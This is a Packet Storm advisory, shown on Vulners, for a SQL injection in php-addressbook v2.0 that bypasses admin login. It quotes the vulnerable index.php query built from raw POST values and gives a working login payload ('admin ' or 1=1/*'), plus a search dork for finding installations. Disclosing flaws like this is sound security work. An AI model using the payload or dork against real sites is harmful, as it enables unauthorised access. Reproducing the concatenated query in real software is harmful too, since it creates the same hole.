Lucene search
K

phpaddressbook-sql.txt

🗓️ 26 Mar 2008 00:00:00Reported by hadihadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

php-addressbook v2.0 SQL Injection Vulnerability, admin authentication bypas

Code
` ########################################################################  
# #  
# php-addressbook v2.0 SQL Injection Vulnerbility #  
# [admin Authentication bypass] #  
########################################################################  
  
Virangar Security Team  
  
www.virangar.org  
www.virangar.net  
  
--------  
Discoverd By : hadihadi   
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all iranian hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal) from emperor team :)  
-----------------------------------  
dork: © php-addressbook v2.0  
-----------------------------------  
vuln code in index.php:  
line 26:$username = $_POST['username'];  
ine 27:$password = $_POST['password'];  
and line 28:  
$sql = "SELECT * FROM $usertable WHERE username='$username' AND password=PASSWORD('$password')";  
  
-----------------------  
vuln:  
login:admin ' or 1=1/*  
password:[blank]  
-------------------------------------  
tnx: all hackerz   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation